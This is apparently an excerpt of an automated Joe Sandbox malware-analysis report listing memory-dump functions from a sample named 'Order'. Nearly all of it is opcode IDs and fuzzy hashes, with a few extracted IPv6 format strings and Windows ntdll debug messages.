                                                                • Instruction Fuzzy Hash: AE9002A2241540934500B2588404B0A550597E1241F56C016E1054560CC62989519235
                                                                Function 01A02AF0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6ef12d3695622bc428b2ca97329b937538b9807b5f1af3dc037aa919ec8c2b85
                                                                • Instruction ID: b3bf212deb2804132673b6437ed2a72ff9bc1ceda215decd8688b13b2d77b284
                                                                • Opcode Fuzzy Hash: 6ef12d3695622bc428b2ca97329b937538b9807b5f1af3dc037aa919ec8c2b85
                                                                • Instruction Fuzzy Hash: EB900226261400030145B558060450B1445A7D7391796C015F1416590CC72589655321
                                                                Function 01A02AD0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: eb61f44895182cc3a6570ee9812658f1e9e1b2fc7fca155bee383e4dae589be6
                                                                • Instruction ID: 8ac0d7d99754cafcd714c2f0cb3de11a9441cb57fd7c1d173466406975f0566b
                                                                • Opcode Fuzzy Hash: eb61f44895182cc3a6570ee9812658f1e9e1b2fc7fca155bee383e4dae589be6
                                                                • Instruction Fuzzy Hash: AD900437351400030105F55C07045071047D7D73D1757C031F1015550CD735CD715331
                                                                Function 01A02DB0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2a449cf81e05c70e96f5af655ed2d3ac03c3125e63942fd46b27be8c27bca795
                                                                • Instruction ID: f75557a43c5a2d002eb99f3932c69ea744233197c77d0ab437034ea51b81a5c1
                                                                • Opcode Fuzzy Hash: 2a449cf81e05c70e96f5af655ed2d3ac03c3125e63942fd46b27be8c27bca795
                                                                • Instruction Fuzzy Hash: AE90023228140403D141715844046061009A7D1281F96C012A0424554EC7598B56AB61
                                                                Function 01A02DD0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6933c35fcc2d6138308ad4e6220d6f8e262dc40cfd4bfb9332cbb03dcd84bab4
                                                                • Instruction ID: d99e4d556c6a9cdc856b84c28b455678babd248c23eb017ecb910e8c47697bf5
                                                                • Opcode Fuzzy Hash: 6933c35fcc2d6138308ad4e6220d6f8e262dc40cfd4bfb9332cbb03dcd84bab4
                                                                • Instruction Fuzzy Hash: B9900222282441535545B15844045075006A7E1281B96C012A1414950CC62A9956D721
                                                                Function 01A02D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b762132bb39d6aaea8c59410aab18768774084bf0ccc3506296f0864cb351ef0
                                                                • Instruction ID: 170774d2fdab3f11ef6338a47f6a207c798833e9629073896544c5897c613966
                                                                • Opcode Fuzzy Hash: b762132bb39d6aaea8c59410aab18768774084bf0ccc3506296f0864cb351ef0
                                                                • Instruction Fuzzy Hash: B890022234140003D140715854186065005E7E2341F56D011E0414554CDA1989565322
                                                                Function 01A02D00 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b21820ba914597471561cb577fab7c98037ae0d0fdc994eaba93b8d86438146d
                                                                • Instruction ID: c34ee3ac1dae34c26e5db54f20defcbc5d355b7cf9f59b6f49923d7c9bea2e87
                                                                • Opcode Fuzzy Hash: b21820ba914597471561cb577fab7c98037ae0d0fdc994eaba93b8d86438146d
                                                                • Instruction Fuzzy Hash: 7D90022224544443D10075585408A06100597D1245F56D011A1064595DC7398951A231
                                                                Function 01A02D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cd56c033d197f694ee9b6d62e9766a21f89cfdddc1f1239826d3c40748cf032f
                                                                • Instruction ID: d525fc487d69fb43ae231e02890b6c07c6b4a8c247019a13064747e8575de5e9
                                                                • Opcode Fuzzy Hash: cd56c033d197f694ee9b6d62e9766a21f89cfdddc1f1239826d3c40748cf032f
                                                                • Instruction Fuzzy Hash: 8890022A25340003D1807158540860A100597D2242F96D415A0015558CCA1989695321
                                                                Function 01A02CA0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5028a23d37adae24192d6fef8d84b7c5e531e6c4fec66158655efaa94f82d65e
                                                                • Instruction ID: 0b1a728b53161a0bfb8c1501ec84c94b14e8c3bdabae776d1632b5ce5983dd05
                                                                • Opcode Fuzzy Hash: 5028a23d37adae24192d6fef8d84b7c5e531e6c4fec66158655efaa94f82d65e
                                                                • Instruction Fuzzy Hash: C290023224140403D10075985408646100597E1341F56D011A5024555EC76989916231
                                                                Function 01A02CF0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: be323a738257702fc2e00b4f19298536803a2823584f43f0526bbb74b3fd2fda
                                                                • Instruction ID: fba860630d9f5793ee7a3d1502b4a57780638f9e8494474f16c7d325484df5de
                                                                • Opcode Fuzzy Hash: be323a738257702fc2e00b4f19298536803a2823584f43f0526bbb74b3fd2fda
                                                                • Instruction Fuzzy Hash: C590043334140403D100715C550C7071005D7D1341F57D411F043455CDD75FCD517331
                                                                Function 01A02CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dc17de04463eb38cebb15e8d120f419b4ee805e904d2dda59f36c87a3c22db89
                                                                • Instruction ID: 9b1b9c8c4443fb5f7444df9518223fd280187523006a64cbff8827583588efe7
                                                                • Opcode Fuzzy Hash: dc17de04463eb38cebb15e8d120f419b4ee805e904d2dda59f36c87a3c22db89
                                                                • Instruction Fuzzy Hash: AA90043374540403D140715C541C7071015D7D1341F57D011F0034554DC75DCF5577F1
                                                                Function 01A02C60 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7049f4b42f6c11601a4e0226ef86d8ce9c90bd5c1e133ebca44b671cba7bbfe1
                                                                • Instruction ID: 97b6e7111af2c9dbe8f7a910e5c05cf13c01d1f6e701ec7b53e9bc3afb013f94
                                                                • Opcode Fuzzy Hash: 7049f4b42f6c11601a4e0226ef86d8ce9c90bd5c1e133ebca44b671cba7bbfe1
                                                                • Instruction Fuzzy Hash: 9490023224140843D10071584404B46100597E1341F56C016A0124654DC719C9517621
                                                                Function 01A02FA0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5732211e86550902178cf25f196556b05f25434a5dc98bb60d12ae886f376b41
                                                                • Instruction ID: 635f7fe818517e6be1c891b5c4bb7d97e39c42341fe9a2cfa895bcd7f7f1de65
                                                                • Opcode Fuzzy Hash: 5732211e86550902178cf25f196556b05f25434a5dc98bb60d12ae886f376b41
                                                                • Instruction Fuzzy Hash: 0390023224180403D10071584808747100597D1342F56C011A5164555EC769C9916631
                                                                Function 01A02FB0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 209c201919550c0a3a632865500b5dffaecf8d9675b0e597bd7ea183ae9a0e9c
                                                                • Instruction ID: 40358e65688e7b5c5262e208c0e9f9744e0546413a04880f1e5e1b09f27b82bc
                                                                • Opcode Fuzzy Hash: 209c201919550c0a3a632865500b5dffaecf8d9675b0e597bd7ea183ae9a0e9c
                                                                • Instruction Fuzzy Hash: 82900222641400434140716888449065005BBE2251B56C121A0998550DC65D89655765
                                                                Function 01A02F90 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a6aec4aa50f52d456dd80422f37f402f951b67bf2af6274030c277fef28ee2c0
                                                                • Instruction ID: 3eaa780ce4d1c5a520403ea5c58b05b1dc062c1101ca4021f7a0e7da6be5297b
                                                                • Opcode Fuzzy Hash: a6aec4aa50f52d456dd80422f37f402f951b67bf2af6274030c277fef28ee2c0
                                                                • Instruction Fuzzy Hash: 5690023224180403D1007158481470B100597D1342F56C011A1164555DC72989516671
                                                                Function 01A02FE0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3b8e5e43ff5f7ac9c9c3e492c45aed33fabc3280f2f58ad9c0b1761427751da0
                                                                • Instruction ID: 7819f59c16a8da4e790aaf55fb8d5e362794c213c1670085306a89517675a24c
                                                                • Opcode Fuzzy Hash: 3b8e5e43ff5f7ac9c9c3e492c45aed33fabc3280f2f58ad9c0b1761427751da0
                                                                • Instruction Fuzzy Hash: 13900222251C0043D20075684C14B07100597D1343F56C115A0154554CCA1989615621
                                                                Function 01A02F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9ec37fcddea95a76b165dcebebe7ac62dc971aa5ba70afa32dc6fce325617783
                                                                • Instruction ID: 2d56d80b5f2d5232da9549e593bca5a99c5b8e0b7add4c4b8b40495e60cf59c6
                                                                • Opcode Fuzzy Hash: 9ec37fcddea95a76b165dcebebe7ac62dc971aa5ba70afa32dc6fce325617783
                                                                • Instruction Fuzzy Hash: 3B90026238140443D10071584414B061005D7E2341F56C015E1064554DC71DCD526226
                                                                Function 01A02F60 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3b4c51e9113474794093fecef02e687ce4e9ea40c6cc3125f2db14e4d1c24940
                                                                • Instruction ID: 56023c8db798a4ef9ede6af732989e780d5b3688fa80c8203d18e4a3e9460dcc
                                                                • Opcode Fuzzy Hash: 3b4c51e9113474794093fecef02e687ce4e9ea40c6cc3125f2db14e4d1c24940
                                                                • Instruction Fuzzy Hash: 4C90026225140043D10471584404706104597E2241F56C012A2154554CC62D8D615225
                                                                Function 01A02EA0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c0c789cc566025eecb13eccac60349e6b997c1ab03bd8b38936f559e09f3a195
                                                                • Instruction ID: 00c254e5cfcbff604aaa89af8484f0707324fac0d1aa55296534d2e69258432c
                                                                • Opcode Fuzzy Hash: c0c789cc566025eecb13eccac60349e6b997c1ab03bd8b38936f559e09f3a195
                                                                • Instruction Fuzzy Hash: 5390047334140403D140715C44047471005D7D1341F57C011F5074554FC75DCFD57775
                                                                Function 01A02E80 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 65316ee45700eaa14a60c687ecdef49b74a486530fd276ad9ec4f255ac4da6c0
                                                                • Instruction ID: 18888cc4c451fd890fe7a304c225e3b5cc58d5f5b300dcef7cc691257f269e79
                                                                • Opcode Fuzzy Hash: 65316ee45700eaa14a60c687ecdef49b74a486530fd276ad9ec4f255ac4da6c0
                                                                • Instruction Fuzzy Hash: 9490022264140503D10171584404616100A97D1281F96C022A1024555ECB298A92A231
                                                                Function 01A02EE0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 94b5c6b2344a3599a1cc2d3e6e2135c6ee7ae7ae552a8c2edd08358418f1603b
                                                                • Instruction ID: 7b45f876e3767bcdd980c0a44746d7590adfe92e5959521fca1886e48832c000
                                                                • Opcode Fuzzy Hash: 94b5c6b2344a3599a1cc2d3e6e2135c6ee7ae7ae552a8c2edd08358418f1603b
                                                                • Instruction Fuzzy Hash: 2B90026224180403D14075584804607100597D1342F56C011A2064555ECB2D8D516235
                                                                Function 01A02E30 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1886aeb3327ce80eb2a9f2a93060fe3edcd6c7d58c1d7b3a59ac095f726fbc33
                                                                • Instruction ID: 846590e0f2fc962c162de18efef2f06a8b3f3814b7c9751288d83973dced10b4
                                                                • Opcode Fuzzy Hash: 1886aeb3327ce80eb2a9f2a93060fe3edcd6c7d58c1d7b3a59ac095f726fbc33
                                                                • Instruction Fuzzy Hash: 5590022234140403D102715844146061009D7D2385F96C012E1424555DC7298A53A232
                                                                Function 01A03090 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2aae4a414afcc2bfd45bcb39aa15e7a96121c69e7db3ef72ce1a071a1ed0dfb2
                                                                • Instruction ID: 70b17d49062cbf266e99895ec66fe7102b7a9b1083e090375c6850e08da888f9
                                                                • Opcode Fuzzy Hash: 2aae4a414afcc2bfd45bcb39aa15e7a96121c69e7db3ef72ce1a071a1ed0dfb2
                                                                • Instruction Fuzzy Hash: 5C90022228140803D140715884147071006D7D1641F56C011A0024554DC71A8A6567B1
                                                                Function 01A03010 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 552a15956e6edf140d1e7036875c47855e33a93372fbe0707043c4b86c01c229
                                                                • Instruction ID: e48f8a44f119dc5fb37d7f82f653ac3b85e6ae180d8c4b8a1b1ca36065a20ca9
                                                                • Opcode Fuzzy Hash: 552a15956e6edf140d1e7036875c47855e33a93372fbe0707043c4b86c01c229
                                                                • Instruction Fuzzy Hash: 0F90022224184443D14072584804B0F510597E2242F96C019A4156554CCA1989555721
                                                                Function 01A039B0 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 872dc99289867f4e2aa785755a35802f396d02b9639fefbdb8be157e413b66d3
                                                                • Instruction ID: c9ed6cda0e04fd6794def4874f1bcb457587acb7718aa3155431c961f61c45a4
                                                                • Opcode Fuzzy Hash: 872dc99289867f4e2aa785755a35802f396d02b9639fefbdb8be157e413b66d3
                                                                • Instruction Fuzzy Hash: A190022228545103D150715C44046165005B7E1241F56C021A0814594DC65989556321
                                                                Function 01A03D10 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9de4b6c3f286bd8360265c783afed44010775165fd88c508a964d8bc5e85d128
                                                                • Instruction ID: 1e178dda137b0e2af6909a979321e324cf9d7ca17633fa61a22ee22715e95e36
                                                                • Opcode Fuzzy Hash: 9de4b6c3f286bd8360265c783afed44010775165fd88c508a964d8bc5e85d128
                                                                • Instruction Fuzzy Hash: 5890023224240143954072585804A4E510597E2342F96D415A0015554CCA1889615321
                                                                Function 01A03D70 Relevance: .0, Instructions: 4COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 523bddc5c6307845f045dd98302735a002ff55e9865dd4d6f4a53048ee55bb45
                                                                • Instruction ID: 7eced7b90e06c77cf750e287a964ed6d5252b6ef29d6ed26d1dfbbed68d7b675
                                                                • Opcode Fuzzy Hash: 523bddc5c6307845f045dd98302735a002ff55e9865dd4d6f4a53048ee55bb45
                                                                • Instruction Fuzzy Hash: C090023624140403D51071585804646104697D1341F56D411A0424558DC75889A1A221
                                                                Function 01A02C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                • Instruction ID: 52e978578e077edba0831d1192d802e0eff8b2011b161982e00cd0f8527f42b5
                                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                • Instruction Fuzzy Hash:
                                                                Function 01A02890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                • API String ID: 48624451-2108815105
                                                                • Opcode ID: 59568194e0aa467bedf9f8c085c84946031e970dc8db4739e9fe55eeb872c3f4
                                                                • Instruction ID: 46f654ec0581af69eb8125e9d5d5683bb325728fd9ac41ba0efa6c19fd121ee5
                                                                • Opcode Fuzzy Hash: 59568194e0aa467bedf9f8c085c84946031e970dc8db4739e9fe55eeb872c3f4
                                                                • Instruction Fuzzy Hash: 4F510AB5A00216BFDB13DBAC9984A7EFBB8BB48340714816AF599D3681D334DF4487E0
                                                                Function 01A72410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                • API String ID: 48624451-2108815105
                                                                • Opcode ID: 1cdcc499049757b1ef0ccd69ed85ec5659d56189e92a955ed7655e8b3e39e5a2
                                                                • Instruction ID: af0474d106ca58dac6a1d8a70a127a56087aaf9aaebfa7216e3258d065444d66
                                                                • Opcode Fuzzy Hash: 1cdcc499049757b1ef0ccd69ed85ec5659d56189e92a955ed7655e8b3e39e5a2
                                                                • Instruction Fuzzy Hash: 0351E775A00645AEDB30DF6CCD90A7FBBF9EB44200B04846BF59AD7642E674EB408760
                                                                Function 019F7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01A34787
                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01A34725
                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01A34655
                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01A34742
                                                                • Execute=1, xrefs: 01A34713
                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01A346FC
                                                                • ExecuteOptions, xrefs: 01A346A0
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                • API String ID: 0-484625025
                                                                • Opcode ID: fbdf84d9699d964f4d6b1dde9785bc2d519c46bb5b3c46646c83c03bb6551ac3
                                                                • Instruction ID: 660ba29c23666c8fbbb86a3962f85e168db890a60ec2ace250fe59af2f838236
                                                                • Opcode Fuzzy Hash: fbdf84d9699d964f4d6b1dde9785bc2d519c46bb5b3c46646c83c03bb6551ac3
                                                                • Instruction Fuzzy Hash: B25128316002197BEF25ABE8EC85FAA77BCAF58305F0400ADE709A71D1E7719A458F51
                                                                Function 01A96940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                • Instruction ID: 5cfc98526af225bf66ed0a71c961fffa7f6403347a9d23c665b0a6756f8c15bb
                                                                • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                • Instruction Fuzzy Hash: A9021571508342AFDB05CF28C590A6BBBF5EFC8704F04892DF9999B264DB31E985CB52
                                                                Function 01A0B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
